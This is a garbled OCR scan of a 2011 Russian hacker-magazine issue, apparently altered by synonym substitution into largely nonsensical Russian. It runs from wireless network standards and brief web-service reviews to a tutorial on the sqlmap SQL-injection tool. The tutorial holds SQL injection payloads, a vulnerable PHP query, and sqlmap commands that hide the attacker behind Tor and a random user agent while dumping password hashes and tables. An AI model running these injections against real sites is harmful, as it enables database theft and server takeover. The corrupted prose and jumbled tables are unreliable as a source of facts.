закачаешься мно гие моби л ь н ые килоом п ьютеры.

п опулярной техноло г ией

аналогом

Ста нда рт стал л равным образом дером де-

мобильны х ЗG - сетей.

масштабах города

фа который на передаче согласен н ных посредь

Су ществуют дополни-

Стандарт со п особен ваша сестра -

пере н ос н ыми уст ройствами равным образом к

тельные надстройки по-над

ходить равно как а л ьтернатива

вые песнь торы всем скопом

самой

во ы побежка на ан тер н ет. В результате

UMTS,

т прицел д осту п а во в рассуждении г ромном

л ичить быстрота обмена

позволяю щ ие уве-

количест ве п окрывают районы

данными:

кру пн ых горо д по отношению во мира.

HSDPA.

HSPA, HSPA+,

Такие козни отно-

ся т ко 0.5G- п околению.

WiMax

позволено наименовать

Wi- Fi,

так на

IWMANI .

Сети

LТЕ энергетически

разви-

л ась недавно, поз т ому

реализован на Христиания ! Ш ве-

н а известный час кто в отсутствии

ция l . Круп н ейшие сото-

раз в год по обещанию на ернутых сетей.

DS L-соединению. Н а базе

со <<Скартел >>

из п ецификации реализуют-

ближай ш ем времени

IYotal на

ся системы, соединяющие

планируют устроить сообразно

локальные сети, возьмем

всей России яруча LТЕ нате

в ос н ове

замену н ыне существую-

Wi-Fi.

С п ецификация появи-

ваются . Успешный чтение

щишки м техноло г иям.

Мобильность

Н ет

Дальность

08-140

Частоты

0,4

Максимальная

Н ет

м

Г Гц

04 М би т/с

00- 050

м

0,4и5 Г Г ц

000 Мбит/с

Да

Нет !но существуют
мобильные спецификации!

Да

0км

0- 0 км

0- 000

0-11 ГГц

000-4000

05 Мбит/с

073 Мбит/с

0885-2025
0110-2200

М Гц

Н ет

км

00-100

м гц

"

км

.

04-862

-

М Гц

М Гц

0 Мбит/с

б

03 Мбит/с

s

""
~

проворство

~

передачи данных

n>

М Гц

Ширина канала

00

Дуплекс

TDD

Доступ

CSMA!CA

00- 00

МГц

TDD
OFD MA

0 М Гц

0,25-20

FDD

FDD/TDD

W-CDMA

OFDMA

МГц

0,4- 00

МГц

FDD/ТD D

OFDMA/SC-FD MA

0-24

""s

М Гц

~

:0

~

TDD

~

OFDMA

Q

s

u

CL

MIMO

Да

Да

Нет

Да

Да

Да

Год выпуска

0003

0009

000 0

0004

0009

0011

БЫТЬ ИЛЬ НЕ БЫТЬ?
IEEE 002.22, п оя во ив ш ийся из р авн да тель н в рассуждении

""""

~

"
касательно

с:

изме н ений, а вот и все п ро ц едура со на мест н ого ис п что до л ьзова н ия спектра

н е д ав н о, п ри н сделал из лицом

вместе с лицензион н ыми п ользовате л ями. Как з н ать, на озмож н о, име н да э т по отношению

же во ые мягкое золото н измы, ко т по отношению р ые могу т п эскер во относительно л ить д онести качес тв е н ную

реше н ие поз на касательно л равно т п окрыть необъят н ые п роста р ы в ш ей ро д ан ы

вместе с во яз ьд аже во самые об тд а л ен н ые у г насчёт л ки пл а н е т ы . Уникал ьн ый п об д ­

качественным ан т ер н етом . Д аже разве убежище д арт н е п что до л учи т д олжной

хо д для р е ш е н ию на в рассуждении пр оса насчёт д медленно н ии многократно т же г по части д иа п азона, ко т орый на

поддержки, в таком случае на любом случае из е г по отношению выхо д ом появи л ся новоиспеченный п од­

Р оссии стои т ос т ро, може т со д е л а т ь 002 .22 самым рас пр остра н енным

ход, когд а небо и земля уст р ойства разных ста нд ар т относительно на невыгодный фуй н ко ц ио н ирую т

от т а ндарт ом демон пр ово дн ой знакомства д ля п ок ры тия бол ьш их п ло щ а д ей.

обособ л ен н о, а взаимо д ейс тв ую т меж д у лицом да гвалт г анизо выв аю т

Дл ваш покорный слуга э т касательно г в рассуждении пр име н яю т вместе с ваш покорнейший слуга р ассмотренн ы е во из т а т ье частное ска н ирова­

окружаю щ ее п ространство интересах вас г в отношении д да г что касается совмест н ого испо л ьзова­

н ие р або ч е г что касается д иа п азо н а, пос т оя н ный мо н равным образом т орин г равным образом касательно т уплотнение

ния . И сие своего ро д а ради ры в. :х:

026

ХА К ЕР

00 / 053/2011

ENCIPHER.IT

~

Н азвание зто го сервиса la сиречь , аж доменного имени! говорит само после себя: симпатия по­
зволяет кодировать сведения на любом сервисе: Gmail, Facebook равным образом любом другом. Как зто

работает ? На панелька закладокдобавляется каждому свой букмарк, ко торый вызывает
простенькую функцию в JavaScгipt, которая криптует вытянутый шрифт со через AES 056.
Перед шифрованием у пользователя запрашивается батман рольная фр я а , которая дальше хорош
прилагаться дл пишущий эти строки рас ш ифровки . П олучается гениаль н по отношению тройка обная система, ежели н ужно
текст, держи п ример , во письме Gmail . П росто выбираем т ело сообщения, понуждение а­
ем получи и распишись букмарк-и стихи автопилотом меняется получи и распишись зашифрован н ый. Если но тебе самому
пришла закриптованная священнодействие га, ведь сызнова а просто-напросто вызываем букмарк, вводим шаг роль- равно
получаемтекстеоткрытом виде .

Для шифрования сообщен ий на л юбы х серв да са х

BTDIGG
~
Есть вагон сервисов-агрегаторов , которые индексируютторренты от самых разны хт рекеров равно

BTDIGGDHT

предоставляютудобный сканирование сообразно ним . BTDiggтoжe позволяетнайти надлежащий обложка во ВitТоггеnt­
сети, хотя использует во корне д ругой путь . Это разведчик по части DНТ-сетиl Напомню, что-нибудь п ослед н яя
n озволяе т гвалт ганизовывать однова д ачи на ВitТогегеnt-сети безтрекера вовсе. П об сут и, сие расnреде­

ленная сетьторрент-клиентов, которая хранити дентификаторы lхе ш иl всех публичных раздач
-т. н . mаgnеt-линков, представляющихсобой 060-битное случайное ч исло. BTDigg каждодневно
индексируетDНТ-сеть равно позволяетпроводить сканирование соответственно м ета- информации, содержащейся во

любом торррент-файле . Можнодаже исnользовать ключевые словадля поиска : raname !поиск

согласно имени файла!, racontent !поиск за содержанию! .

>

...

-·- -----···
."______-

ideone.com

---....--.

------------

...-....- .-;

0 0!.-Оа .

- ------. · "J ,l

-.,.,......-

Для запуска заключение получай ра з ных автор з ы для а х стойком на браузере

IDEONE
jdeone corn

Разстолкнувшисьснеобходимостьюскомпилироватьвби н арникпростенькийкод,
ваш покорный слуга н а д олго запом н шлам п роект ideone, тот или другой ме н пишущий эти строки т насчёт гда выручил. П относительно су ти, сие что до н лайн­
комок п илятор равным образом настройщик д ля паче нежели 00 языков n ро г раммирования . Д ру г ими словами,

_,_,__. . ..

- ·· - · --·-·

...,..... _
об -- об

_

·~·""·

x-.,..!OI!oo!

Поис для торрентов поDНТ со совокупляться

дозволено изобразить адрес да включить его напрямую во браузере. Поддерживаются С/С++, Java, С#,
AssemЫeг, Objective С , по сию пору скри п товые языки lв томишко числе Pythonl равным образом пусть даже ассемблер . Важно
лишь только поместиться на ограничения : 0О секунд получи и распишись компиляцию, 05 секу нд !если невыгодный зарегистри­
роваться, ведь лишь только 01 держи выполнение, 056 Мб nамяти . Помимо зто го , расписание никак не сможет
обраща т ься во Сеть равным образом коптеть со файлами . П роект предоставляеттакже API, которые по полной обойме
ис п ользуютсейчас п ри л ожениядля р аза ны хмобильных nл а т форм .

(y~~~~mEP
Н аконе ц -то ваш покорнейший слуга н аше л ту систему дл мы монитори н га хостов , которая меня п что касается л ностью усище т раива­

ет. Я говорю относительно демон п латном сервисе tagBeep. Суть сервиса понятная - п роверять рабо т ос п о­

Uptime monitoring for smart people
Slmplto 00 uя and frН: fOf up to SO S4."Mrs.

собность веб-серверов да уве д омлять по отношению н аличии проблем . TagBeep п остроен nре д ельно про­

---__

_ _ tu: _
...,_
, _ _ __

сто, хотя близ этом позволяетзадать тонкие границы интересах nроцедуры п роверки . Например,
позволяется по ниточке указать, который именн касательно противоречие полагается отзываться сервер, а какой- никак не приходится .

Или, ко nримеру, разделаться време н утнапиштим предел получи загрузку страни ц ы !скажем, 00 секунд!. TagBeep
умеетвизуа л изироватьвремяоткликаввидекрасивыхграфико~сохраняетскри нш оты

-

tagBeep .... - ·-· ......

·IIJ

.

---......

Stgn Up for f reel

_ _ us.o. _ _ _ _

"

...._

со на оих роботов lв какой приглянется моме н т мож н в отношении посмот р ет ь , во вкусе выгл автор этих строк д ел сайт l . АSМS-опове щ е н ия,
та услу г а, вслед которую совершенно неотменно берут денежки, после этого ноне бесплатна.
Суперпросто й да удобны й мон равно торинг х скелет

ХАКЕР

00 /153/2 011

027

PCZONE

Мира Штамnар [miгoslav.stampar0gmai l .com l

S lmap, либо
S L:-инъекции
сие не мудрствуя лукаво
ОДНА ИЗ ЛУЧШИХ
УТИЛИТ ДЛЯ ПОИСКА
И ЭКСПЛУАТАЦИИ

SQL-УЯЗВИМОСТЕЙ

т ак, чт по отношению т акое

sq lmap? О д нате

изо мо щ ней ш их отк рыты хутилит

дл ваш покорный слуга п ентестера,котораяа во тамара т изируе тп ро ц есс п оискаи

экс пл уатации SQL- инъек ц ий не без; ц е л ью извлече н ия д анн ы х равным образом ли
зах на а та хуй а л е нн ого хоста. Ч так д елае т sqlmap хорошо ич н ым ото дру г их у т иначе говоря т
дл моя особа об н аруже н равным образом мы SQ L-и нъ ек ц ий , т ак сие на озможнос ть экс п луатировать

каж д ую най дескать нн ую уя з на имост ь . Это эскер н а ч ает, ч т по отношению sq lm ap способе н малограмотный
ведь ль ко н ахо д да т ь « д ырку>>, да е щ е да заюза ть ее п в рассуждении п касательно лн ой п ро г рамме. А
ко ль литоринх во ка ч ест во е вслед за дачи от т а ви тс моя особа име нн в отношении экс пл уа тация у язви мос ти ,

так ска н еру п р да хо д равным образом тс автор б ы ть особе нн касательно во нима т ел ь ным для д ета л ям: возлюбленный н е
буд е т ваш брат д авать м илл ио н лож ны х вместе с р абат ыв а н ий <<так, получай на не без; мы маз не без; л у ч ай>>

! равно как э т в рассуждении м ы на да д им закачаешься м н по отношению г их др у г их пр равно л оже н иях]. Л юбая п касательно те нци а ль ­
возьми автор этих строк у моя особа з на имост ьд насчёт п по части лн равным образом т е льн по части п ро на ер моя персона е т вместе с ян а на озмож так со т ьэксплуа­

Разработкой сканера занимаются неуд человека. Мира Штамnар
(lilstampaгml, nрофессиональный формирователь софта изо Хорватии , равно Бернар­

т а ции . Ска н е р равным образом з коробки равно д ете относительно гр ом ны м функ ц ио н алом, н ачи н ая в отношении т

А• Дам•ле [lilinquisЬJ, эксперт до ИБ изо Италии, без дальних разговоров nроживающий равно
корпящий на Великобритании . nроект nоявился сверху освещение во 0006 г. вследствие
Данмзлю Беллучи [lilbelch), хотя фундаментально быстро стал развивать­

DB MS], соз д а н ия д ам п а

ся nосле того, вроде на 0009 г. на работу включил да сь Миро со лав равным образом Бернарда .

во озможности касательно п ре -де л ения систем ы упра вл е н да моя особа базой д а нны х !д алее
! ко п равно и] д анн ы х равно зака нч ивушка автор п что до л у ч е н ием до­

со ту п а для из равным образом вместе с т еме не без; во озмож н остью обра щ а ть не без; аз многогрешный ко пр по части да зволь ны м фай л ам
н а хае т е равным образом вып относительно лн мы ть н а се р вере п роизво ль н ы е искажение нд ы. И во се-таки
гл а вн ое - э так об н а р сделано н ие во озмож н ос т да со д е л а т ь ан ъек ц ию SQ L- кo дa .

КАКИЕУЯЗВИМОСТИ
МОЖЕТНАХОДИТЬSQLМАР?
Е со ть п пишущий эти строки ть осно вн ых ко ла ссо во SQ L- равным образом н ъ ек ци й, да по сию пору их п относительно дд е р ж равно вае т

sql map:
UNION querySQL injection. К л ассический

на ариа нт вн е др е ни пишущий эти строки

SQ L-кo д a, ко гд а на уязв да м ы й чета м е т р п ере д ае т ся на ы р аже ни е,

н а ч равно н аю щ ееся вместе с

«UNION ALL SECECT>>. Э т а т ехника

работает,

ко гд а веб - возле л оже н равным образом автор этих строк бери пр ямую во вал во ра щ аю т р езул ьт а т выв относительно д а

неподвижность нды

SELECT н а

от траниц у: от ис п что до ль зо на анием ц ик л а fог равным образом ли п насчёт ­

хожим способом, эдак ч ведь каж д ая регистрация п по части л у ч е нн ой равным образом з БД на ы потому что р ко равно
п ос л е д об во а т е л ь н в отношении ваш брат закачаешься дит от ваш покорный слуга бери не без; т ра книзу у.

Sqlmap м ожет т акже экс­

пл уат равным образом роват ь ситу ацию , ко гд а на вал вр а щ ае т ся т об л ько п ервая ради 14 вместе с ь

с вас ибо р для равно IP aгtial

UNION q u e г y SQL i пjectio п ].

Еггог-Ьаsеd SQL injection. В вместе с л учае э т ой а т аки ска н ер заменяет
vlew plctures of the artlst

гиттия равным образом д об авл яе т во у моя особа з ви м ый п араме т р вместе с да н т акс ич еск да н е пр а вильн ое

выр ажен равным образом е, п ос л е ч е г об п а р не без; ит НТТР- в отношении тв е т ! из-за г об л об вки равным образом те л о] во п о­
comment on thls artlst

ис ке что до ши сторона

DBM S,

во ко так р ы х со д ержа л мастак ь б ы вслед за р а н ее равно з во ест н а автор этих строк

равным образом нъ е цир касательно ванн ая п ос л е д что касается на а т е льн ос ть сименс на по отношению л по части на равно гд е -т об « р ваш покорнейший слуга д что до м >>

Links
Securily art

Fractal Explorer
About Us Privacy Pollcy Contact Us

выв что касается д получи инт ересую щ ий н бог п насчёт д после пр ос. Э т а т ех ни ка р або т ае тт что касается ль­

ко т относительно гд а, ко гд а на еб -пр равным образом л оже н ие п насчёт каким-т что до прич равно н ам !ч а щ е безвыездно г об
на ц е ля х отлад ко и] р аск р ы ва е т по части ши бк да DBM S.
Stacked queгiesSQLinjection. С ка н е р пр оверяет,

п одде ржи на ает л да

на еб -пр равным образом л оже н ие п ос л е предварительно вате льны е из-за п рос ы , да , если бы по отношению н да во ып что касается л няю т­

UNION querySQL injection

028

не без; мы , доба вля ет на уяз вимы й п а р аме тр НТТ Р - из-за пр оса т в отношении ч ломоть после п автор праздник

ХАКЕР

l;l равным образом

00/153/2011

Sqlmap, иначе говоря SQL-инъекции-это прямо

,·itJcpiщisЯr.
co.tuЬit а.tщ_ тэut ii: .ad.:ntы

""

f6W""f""c FriQsiJb Uipk-tt,

Sй3il:6 dr:!auttl

n»pt p:tl~cc.t etum Ьс~. Ш ~ut Ri!l \ CI ~di"odto, JpJaНt~ ,.j!p~S~:iltf..
E~r сrм m.J~"-91:4 pМtUo:nr pЬJвcllus юdctiJqucdii:. ,~SfiЬuluш tf 01~ urм
~iiOI CU, ...-cl Э~:ckf~ Rm:l o.Y$:~1tlct quit ltllМif. ullиm: Otp:f rcd: IIUII II ~Q
0,:\bJIC id,ttbl rwUa.g;puws ut"Dj, pelkftr~ rM inrlsuf... \il~vcl o.-c(l(li.э. Doo:c
\"<!fiЬuluru. cp.."iUCS "-."4101 ffl\5 ~О liЬcro (,.":f"m:tiNIJI, tftiф"f S~XiiJ. \ ilt.: спв ~
ff ~ilb . Eiil Ut.16.we so..--losqu. ur рпсэ:яr ~ lc:tiUS lac•t..

lf

~--

••

ln -.:1soda~s utoШt. Mt fl4)xt~ qui s.чuc п StXiesqu fial(, ooel шd.».v jtf:lt*ltt я~
dutJpritni~pe.n.-.,,~

sia. к:mщuе

N~uc»:d ~t JN

IJ"$8C:UIIc"" "" esa
COIIU Ь1111 i& Wtll а М!: М 0МiЮ d~щ. Du

СUм:б. \\"l~f Ш~ ~8.. j lll(:( .аб] <1!~
lfPb ducitrwd:~ .мr:~cr~~~ vcJA (""ibus 01011, vlvc:m lu ~ rьксо con ~a116.
rttJIII \-iVC:Ш, pt:l).•111~ litl $\."tll tli:Wtia. \"~С ~f~COttVIJ i б, "\"f\~fttuf. ctOI IUtpti
ckt1 Ni* lro

J

Jolhcr

!fв•-Ьfis""

J"IW""irrlf. <n.todJ;) L~~ra J. d~ mша.~ p.:.miiOf crJr, CJ t~rifus ..,."...., U\1
\"~ca."imistil. \o"CI"J:"ItМIJI:OitlltV>do likp)ltlhll", "o"iltc ltllttdUШf~ \"CblWb 0111
«ttubltt~mюtS iDdJ:euшniЫ. dui , м, ,-;uс Fr~IЬ J.llll~ . ~iliid:stnнll
•trr.IS!JIA p;llctA:J.qUC Cl ctlltn b c.!JI, ifl М1Jftt lti!-f VC.I ~ (kl).y odfo. iрющ tldr6r:"i11~,

Ep:r C("fl( nu~ta. t:d p~W~:IUfa."fll pltf«tlus ю:lcПS4jucd6;\"(flibuluшlf ii1t~ urm
pccttit« cu, vcl s-;cL"f •
ма.-t ("(WWS(Wrucr quiJ.. tt~s Шlam:orp:t. rc:dr: ttutla qiOJ
d:t)."f.: d , IИ!tooUA.\ApwttSun».pc(l."fil~ f ~ ioriSUJ.. \11111:Vtl o:eod.;, I>I.""ICC
\"<"ЯiЬutшiL •яю: tJI"Wf C"f\~ i." " lif>eN (мn.-newш. ilil~ :ю:iis ooir~~~: с:rм I"U"):
& ~ftЬ .

Elir scd~.Ю.:iO !-qU, Ul rrJC!J\"111 ~ lo:W• l ~iiUI.

:1 0=

lh .m:t s.dtks.JOOIIiJ.. Jil wpitfl quisqutU!ЮeiOSoqV IIIYI:. \Cio:cd:ilY pi"CSiffll rtiJI:5I:."13
ckttirciflliJ.. pcl}."tt~ Jil, S«nOCq.:tt . NC"qUc~d ~. ~ piWnШIIciMsi:cя

~=-

0

0

Jn мn:t todi):swoUit. si1W{li.--.. ~i~qwcac~u ld:", vcl l"ll:tOO.kwpn(::Sillffif ""~

c uмg. "\"Q~S. nldQS<pi:;. а111~ t.1i$l ~ct (ionubla ii~ta**..:a ~di.J11L Dui
lipb duc.ilшs ~~tl" li ~ vct"l ftto:ib11S0 011, \ ivcш lucw l"h ~R~n coavaJI.is.
trJitl \lvem. pclkot~ vcl SCIIt cl« w.ta. ""~t IМ:f(ЬQco u~ aJJIS. \ "f""lfiWS- cros hlrp15

<kiJS:prittlif.. peJ.k111 CiQ"Itffi,U:o"tЬ."qUC, N~UC~~.so.1~CfJfiCtk6 J«t
CIIМIS. \\)q:t"-Js t•as ~в. anteeл6J "~~ Coflubla in \11\а aco:JCL М»d~ 011. Dui
l~ b ducM" io\:~ct lt •••c iA ftp;iЬtJs noa, vivcm lu~ Phan:ucottvt11118..
mш ~ivem. pclkllltsqQ:" vcl $1Ntl eiA \l"lta. \ " r.)t tй..-IO!wn coцvtlllls. ""f"~lltUJ ctOJ. tufpii

ati

~~ N ~ I ю

t: ~W~t: IQ)

Boolean-based Ыind SQL injection

затем внедряемый SQL-зaпpoc. Этот присутствие ем во основном используется

внедренным кодом. Здес ь вот и все используется а лгоритм двоичного

для того вн едрения SQ L-к оманд, отличных oтSELECT, напримердля мани­

поиска. Кроме того, nрименяетс моя особа внеочередной методдля вери­

пуляцииданными [с через INSERT тож OELETEI . Примечательно,

фикации данных, с целью снизить маза никак не правиль а го

чтоте х ника потенциально можетпривести ко внутренние резервы чтения/

извлечения символа ради нестабильного соединения.

журнал изо файловой системы, а в свою очередь выполнению неподвижность нд на ОС .
Правда , взависимостиоти вместе с пользуемойвкачествебэк-эндаси стемы

Несмотрянаточтосканерумеетавтоматическиэксплуатировать

управления базами данны х, а как и пользовательски х привилегий.

найденные уязвимости, нужно обстоятельно представпять себя каждую

Boolean-based Ыind SQL injection. Реализация этак называемой

с используемы х техник. Если топик SQL-инъекций тебе доколе знакома

расплывчатый инъекции: факты с БД на «ч истом » виде уязвимым веб­

только лишь бери пальца х, рекомендую полистать ар х ив][ либо прочит а ть ма­

приложени ем нигде отнюдь не умереть и малограмотный встать з вращаются. Прием та кже называется

нуал Дмитрия Евтеева <<S QL lnjection: От А прежде Я >> I ЬJt . lvlpBSNVA J. Важно

дедуктивным. Sq lmард обавляетвуязвимый парам етр НТТР ­

равным образом лошадь мать, аюшки? с целью разны х OBMS реализации атаки почасту

запроса синтаксически по правилам составленное выражение,

здорово отличаются. Все сии случаи умеет делать sqlmap равным образом держи

содержащее подзапрос SELECT !или любую другую команду с целью

установленный секунда поддерживает MyS QL, Oracle, PostgreSQL, Microsoft

п олучения извлечение с базы данны х !. Для каждого полученн в рассуждении го

SQ L Server, MicrosoftAccess, SQLite, Fir eЬiгd, Syba se равным образом SAP МахОВ .

НТТР-ответа выполня етс моя персона сравне н ие headers/body страницы

ФИШКИ

не без; ответом получи вечный запрос-таким образом, обслуживающая программа

SQLMAP

можетсимволзасимволомопределитьвыводвнедренного

Дви жокдля определения SQ L- уязвимостей - хрен от ним равным образом самая важная ,

SQL- выражения. В качестве альте рнативы абонент может

только все ж таки малограмотный единственная порцион функцианала sqlmap. И заблаговременно нежели

позволить строку другими словами регулярное отображение интересах определения

до показывать работ у ска нера во действии, малограмотный могу пускай бы бы вкратце, хотя отнюдь не

« tгuе >>-с траниц !отсюда равно обозначение атаки!. Алгоритм би нарного

оповестить что касается некоторых его фишках. Итак, на sqlmap реализовано:

пои ска , реализованный на

sqlmap ради выполнения этой техники,

Извлечение имен пользователей , хеш ей их танцевальный шаг ролей , а и при­

станет равным образом звлечь первый попавшийся отображение вывода не более взяв семь раз НТТР­

вилегий равно полей.

запросами. В томишко случае, в некоторых случаях дедукция sos т ои т малограмотный токмо изо обычных

Автоматическое опознание как ис п ол ь зуемо го хеш а да воз­

символов, скэнар п одстраивает алгорифм интересах работы со паче

можность взлома его от через брутфорса п относительно словарю .

широким диапазоном символов !например пользу кого uпicode "al.

Получение списка баз данны х, таблиц да из толбцов.

Time-based Ыind SQL injection . Полностью слепая инъекция. Точно

Во змож ность предпринять глубокий тож выборочный дамп базы данных.

круглым счетом но во вкусе равным образом на предыдущем случае, автосканер << играет >> от уязвимым

Продвинутый прибор поиска баз, таблиц сиречь аж веха цов !по

парам етром . Но на этом случае добавляет подзапрос , каковой при­

на сем базам сразу!, сколько может бытовать надо с целью определения та­

водит ко пау зе работы

OBMS получи определенное величина секунд
!например, не без; п омо щь ю командSLЕЕР(J alias BENCHMARKIII. Исполь­

блиц из <<интересными>> данными по-видимому имен пользователей luseгsl

зуя эту особенность, автосканер может посимвольно извлечьданные изо

Загрузка alias , наоборот, закачка произвольны х файлов в сервер,

БД, сравнивая сезон ответа для неподдельный требование равно нате запрашивание со

нашел ли уязвимое веб-приложение использует MySQL,

сиречь мгла алей lpassl.

Po s tгeSQL alias

MySQL,

Microsoft SQL Server.

Выполнение произвольных команд равным образом заграбастывание шелла, коли нате хаете
равно вместе с пользуется одна изо СУБД , перечисленных на предыдущем пункте.

Поддержка прям в рассуждении г об подключения ко базе данных ! помимо явного ис­

SQL-ИНЪЕКЦИЯ: ЧТО ЭТО?

пользования SQ L- уязвимостиl от использованием полученных на
хо дескать атаки имени да шаг рулон ваш покорнейший слуга пользователя ради поперед вместе с тупа для ОМ BS, а
вот и все IР- адреса, п вопль т а равным образом имени базы данных .

SQ L- инъекция- сие атака, направленная держи веб-приложение, во
хо -де которой конструируется SQ L-выражение с пользовательского

ввода п у тем безыскусственный конкантенации !например, $query; " SELECT

*

Установка надежного ТСР- сое динения !так называемого out-of-

bandl в лоне машин ой пентестера равным образом хос том, бери котором запущен
се рвер баз данных. В качестве обертки на сего канала может

FROM users WHERE id;" .$_REQUEST[ "id" ]l . В случае успеха атакующий

от преступник интерактивная командная линия lшеллl , сес эта Меtегргеtег

может изменитьлогику выполнения SQL-зaпpoca так, на правах сие ему

другими словами теледоступ для удаленному рабочему столу вследствие VNС-подключение .

нужно . Чаще лишь некто выполняет азбучная истина fingerprinting СУБД, а в свою очередь

Повышение привилегий дляпроцессабазы данных после команду

извлекаеттаблицы от особливо <<интерес ными >> именами !например

getsystem Metasploit"a, которая, исключая прочих , реализуетизвест­
нуютехнику kitrapOd IMS1 0-0151.

<< users >> l. После этого, на зависимости через nривилегий , от которыми за­
nущено уязвимое приложение, дьявол можетобратиться для защищенным

частям жопень - э нд а веб- прил ожения !например, прочитатьфайлы держи

Как нераздельно изо авторов этой утилиты могу ск азать: сие подлинно

со тороне хос таиливыполнитьпроизвольныекомандыl.

благой ан ст р у мент, соз настоящий х акерами для того хак еров . И симпатия работает!

ХАКЕР

00 / 053/2 011

029

PCZONE
ПРИСТУПАЕМ К ПРАКТИКЕ
Убедиться во э часть тебе помогут безграмотный ско лько мои х сценариев. Это наибо­
л ее типичныеситу а ции ,кото рыеи вместе с польз ую ведь со н что до вны евозмож ности

ТИПИЧНАЯ ОШИБКА

sqlmap . К со л по части во у, твоя милость т оже можешь вместе с ра зу пров ери ть огульно функционал
сканера- наприм е р, в сознательно созданном тренировочном при­

ложении с OWASP l www. owasp . oгg l . на котором сознательно воссозданы

Той ошибкой пр ог раммистов, за которой со тановится в зм ожной

многие изо опасных ошибок прогр аммис тов . Тут полагается сказат ь , который

SQL-aтaкa, чаще во се г относительно является пр выбоина аз многогрешный конкантенация нефилыруе­

sqlmap написан в Pythoп" e, а значит, твоя милость сможе шь из-за п усик ти ть е го по-под

мых иначе говоря неприводимых ко нужномутипу значений поле аме тр ов на со тро­

каждый ОС . Единств е нноетребовани е - сие пасть новленный во со истеме

ках, которые со д е р жа тSQL-выра а ния. Например , во РНР н а иболее

интерпр ет атор пайтона. В качестве объекта на теста нате проникно­

частым примерам небрежности является пользование стих врод е

вени е ваш покорнейший слуга буду проэксплуатировать вирт уа льн ую машин у, держи которой хорошенького понемножку

$query="SELECТ

кр у тить ся не без; тандартный из тек LAMP [Liпu x/Apa che/ MySQL/PHPI сообща

name, description, comment FROM catalogs WHERE
catid=" .$_GET( "catid" ]. Как твоя милость знаешь ли , GET параметр "ca tid " напря­

не без; н еско лькими уяз вимыми ве б- приложениями.

мую извлекается да з зап ро из а да вслед пр ос в таком случае может со д е покатываться з л касательно сокрушительный

СЦЕНАРИЙ N21
Условимся, ч так наш брат хотим пр оэкс плуатиров а ть уяз вимо сть , котофей орая была

SQ L задание . Таким образом, взломщник может пр осто прив ести URL
для наружность у словно «http: //www.site.com / vuln. php?page=front&catid=-1
UNION ALL SELECТ database(), current_user(), version()&uid=e », интересах

найдена во GЕТ-параметре «id >> веб-страницы, расположенной по части адресу

тог в отношении дабы произвести информацию об базе д анных, ко торая отобразится

http: //www.site.com/vuln.php?id=1lдля указания URL короче кнопка -ul.

прямов со держимомстраницы .

Чтобы вместе с ни з ить подозрительн ую активность, пишущий сии строки будем ма ски р что до ваться п что касается д

обыч ный браузер [ клю ч --гandom-ageпtl, а к подключ е ния использо­
во а тьза щишки щ ен ный свищ ТОR- козни 0 -- toгl. Итак, вслед пускаем sqlmap:

INFORMAТION_SCHEMA . CHARACТER

$~python

_I}"Jte: UNION.._guery
Title : MySQL UNION query {NULL) - 0 columns
Payload : id=1 UNION All SELECT NULL, NULL, CONCAT{CHAR{ 08, 08, 016
, 02е, 08), IFNULL{CAST{CHAR{74, 06, 03, 012, 011, 013 , 0е3, 018 , 0е , 04) AS СН
AR), CHAR{ 02}} ,CHAR{ 08, 08, 021, 0е2, 08))

sqlmap_,py -u "http: //www.site .comLvuln.php?id-=l::_
- -random-agent --tor
sqlmap/1.e-dev {r4365} - automatic SQL injection
апd database takeover tool

SETS GROUP

ВУ

x).Q)

Сканеропределитнесколькоточекдлявыполненияинъекцийв

07 HTTPISJ- зa пp ocax. Обрати

внимание, чтодля каж д ой с нихуказы­

вает ся т ип , а такж е пэйлоад.

_Iy_pe: ANDLOR time - based Ыind
Title : MySQL2_S.e .11 AND time-based b_lind
Payload : id=1 AND SLEEP{1e)

Place : GЕТ
Parameter: id
_Iype: bQolean-based Ьliпd _
Title: ~NQ.Qp_Qle_a n : bas~_Q.Jind- WHERE QC.!:JI\.VIN.§__ ;;l_~,ц~----­
Payload : id=1 AND 0826=1826

но др угих тех нологий , равно спо льз касательно ванны хвеб- прил оже ни ем:

Туре : error-based
Title : MySQL >=5.е AND error-based - WHERE or HAVING clause
~yload: id=1 AНJL{SELECT 0232 FROM(SELECT COUNT(~},CON(.AT{
CHAR( 08 , 08 ,11Q"l.Ш,58 }.,_{SE LECT (CASE WHEN (8532=8532) THEN 0
ELSE е END}},_CHI\R{ 08 , 08 ,121 , 0e2 ,~8 }.,FLOQI!(RAND(ill * 0 ))x FROM

Помимо эт ого , ска н ер выполнит ра спознава ни е базы данных, а так­

(е2 : е1 :45] (INE.Q]_the back-end DBMS is MySQL _ _
web application technology : РНР 0.2.6, Apa che 0.2 .9
back-end DBMS : MySQL 0.е

В конце концов п касательно л у ченны е информация будут после писаны на определен­
ный файл:
(е2 : е1 :4 0] [INFO] Fetched data logged to text files under "/ opt/
sqlmap/output /www .site .com"

~ The page cannot Ье dis... х

е

iQ}

СЦЕНАРИЙ N2 0
Теп е рь сле дую щишки й рядом мер. Предп касательно л ожим, сколько автор сих строк хотим устро ить

сильнее д е тальный fiпgeгpгiпtiпg 0-fl да полу ч итьт екс товый баннер

The page cannot

Ье

0--Ьаппегl сис т е ты да я у правления базой данны х, начиная ее офи ци­

displayed

альное название, н омер версии, а равным образом т еку щ его поль зователя
Th~e
Ье

is

а proЬiem

with the p;sge you are trying to

recкh

and it cannot

dlsplayed.

роли 0--pas sw oгds l вме вместе с те вместе с именами таблиц 0 -- taЫesi , так далеко не в книжка числе и
системные,[--ехсlu d е-sуs dЬsl-для всех со д ержа щишки хся на СУБД баз

Please try the following :

0--cuггeпt-useгl. Кроме того, нас будут занимать сохраненные движение ­

д анных . Н ет пр об л ем , после п ускаем скане р :

Olck the EШ.t1!l button, or try ~ain later.

• Open the 072 .16. 062. \32 home page, and then look for links tt
the informatfon you want.

$ python sq l i!!_ap.py -u "l:!.:t1p: //www.site.com /v ul.o_.php ?id=1"
--random -agent - -tor -f --banner --current- user --passwords
--taЫes --exclude -sysdbs

НПР

000. 000 - Internal Server Error - ASP error
Internet lnforrмtion SeMces
Techn ical Information (for support personnel)

Оч е нь живо автор секс у чим во се показатели об равным образом от польз уем ы х т ехно логия х,
OLE DB Provider for
[Microsolt)[ODВC

falled

wh~n

ООВС

Drivers

(О х80040Е07)

SQL Server Drlver)[SQL Server)Conversion

converting the nvarchar value ":Microsoft SQL Server

0005- 0.00.1399.06 (lntel Х8б) OCt 04 0005 00 :33 :37
Copyrlght (с) 0988-2005 Microsoft Corporotion Express Editlon
on Windows NT S. l

0

Error-based SOL injection

030

которые вслед прашивали:

(Вuild

0600 : Service Pack 0) :" to data type

(е2:е8:27]

